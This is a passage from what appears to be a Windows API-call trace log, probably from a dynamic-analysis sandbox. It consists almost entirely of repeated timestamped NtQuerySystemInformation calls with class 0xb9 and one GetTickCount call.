ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee00, Length=0x28, ResultLength=0x0) [0227.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef60, Length=0x38, ResultLength=0x0) [0227.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x28, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x28, ResultLength=0x0) [0227.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef60, Length=0x38, ResultLength=0x0) [0227.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x20, ResultLength=0x0) [0227.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef60, Length=0x38, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x20, ResultLength=0x0) [0227.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x20, ResultLength=0x0) [0227.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x20, ResultLength=0x0) [0227.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1f0, Length=0x50, ResultLength=0x0) [0227.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1f0, Length=0x50, ResultLength=0x0) [0227.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1f0, Length=0x50, ResultLength=0x0) [0227.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x50, ResultLength=0x0) [0227.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x50, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x50, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0e0, Length=0x50, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x38, ResultLength=0x0) [0227.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x28, ResultLength=0x0) [0227.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x28, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee40, Length=0x28, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x28, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x38, ResultLength=0x0) [0227.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x28, ResultLength=0x0) [0227.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef30, Length=0x28, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x38, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x20, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x20, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x20, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff010, Length=0x38, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee90, Length=0x20, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x20, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee20, Length=0x20, ResultLength=0x0) [0227.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff320, Length=0x50, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff320, Length=0x50, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff320, Length=0x50, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff1b0, Length=0x28, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0c8, Length=0x50, ResultLength=0x0) [0227.427] GetTickCount () returned 0x1179463 [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef98, Length=0x58, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x38, ResultLength=0x0) [0227.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x28, ResultLength=0x0) [0227.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x28, ResultLength=0x0) [0227.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x28, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x28, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed50, Length=0x28, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x38, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0227.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fedd0, Length=0x28, ResultLength=0x0) [0227.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x38, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x20, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x20, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x20, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x20, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feeb0, Length=0x38, ResultLength=0x0) [0227.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed30, Length=0x20, ResultLength=0x0) [0227.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x20, ResultLength=0x0) [0227.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x20, ResultLength=0x0) [0227.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.531] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef98, Length=0x58, ResultLength=0x0) [0227.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.532] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x28, ResultLength=0x0) [0227.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x28, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x28, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecb0, Length=0x28, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed20, Length=0x28, ResultLength=0x0) [0227.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0227.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0227.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x28, ResultLength=0x0) [0227.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x28, ResultLength=0x0) [0227.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0227.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0227.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec10, Length=0x20, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb90, Length=0x20, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee70, Length=0x38, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x20, ResultLength=0x0) [0227.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec80, Length=0x20, ResultLength=0x0) 